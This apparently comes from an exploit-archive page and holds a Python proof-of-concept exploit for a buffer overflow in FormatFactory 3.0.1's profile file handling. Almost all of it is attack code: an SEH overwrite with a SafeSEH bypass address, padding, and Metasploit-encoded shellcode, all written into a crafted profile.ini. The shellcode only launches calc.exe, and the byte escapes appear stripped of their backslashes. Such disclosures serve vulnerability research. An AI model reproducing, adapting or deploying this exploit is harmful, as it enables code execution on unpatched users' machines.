Home / exploits FormatFactory 3.0.1 Buffer Overflow
Posted on 21 November 2012
#!/usr/bin/python # Exploit Title: FormatFactory v3.0.1 Profile File Handling Buffer Overflow # Version: <= 3.0.1 # Date: 2012-11-19 # Author: Julien Ahrens (@MrTuxracer) # Homepage: http://www.inshell.net # Software Link: http://www.pcfreetime.com # Tested on: Windows XP SP3 Professional German # Notes: - # Howto: Copy .ini to %USERPROFILE%My DocumentsFormatFactoryPicCustom from struct import pack file="profile.ini" junk1="xCC" * 260 nseh="xebx06x90x90" eip=pack('<L',0x024C1923) # CALL DWORD PTR SS:[EBP-C] at 0x024c1923 - SafeSEH Bypass nops="x90" * 10 junk2="xCC" * 10000 # windows/exec CMD=calc.exe # Encoder: x86/shikata_ga_nai # powered by Metasploit # msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00' shellcode = ("xbax68x3ex85x1fxd9xcaxd9x74x24xf4x58x29xc9" + "xb1x33x31x50x12x83xe8xfcx03x38x30x67xeax44" + "xa4xeex15xb4x35x91x9cx51x04x83xfbx12x35x13" + "x8fx76xb6xd8xddx62x4dxacxc9x85xe6x1bx2cxa8" + "xf7xadxf0x66x3bxafx8cx74x68x0fxacxb7x7dx4e" + "xe9xa5x8ex02xa2xa2x3dxb3xc7xf6xfdxb2x07x7d" + "xbdxccx22x41x4ax67x2cx91xe3xfcx66x09x8fx5b" + "x57x28x5cxb8xabx63xe9x0bx5fx72x3bx42xa0x45" + "x03x09x9fx6ax8ex53xe7x4cx71x26x13xafx0cx31" + "xe0xd2xcaxb4xf5x74x98x6fxdex85x4dxe9x95x89" + "x3ax7dxf1x8dxbdx52x89xa9x36x55x5ex38x0cx72" + "x7ax61xd6x1bxdbxcfxb9x24x3bxb7x66x81x37x55" + "x72xb3x15x33x85x31x20x7ax85x49x2bx2cxeex78" + "xa0xa3x69x85x63x80x86xcfx2exa0x0ex96xbaxf1" + "x52x29x11x35x6bxaax90xc5x88xb2xd0xc0xd5x74" + "x08xb8x46x11x2ex6fx66x30x4dxeexf4xd8xbcx95" + "x7cx7axc1") poc="Type=" + junk1 + nseh + eip + nops + shellcode + junk2 try: print "[*] Creating exploit file... "; writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print "[*] File successfully created!"; except: print "[!] Error while creating file!";
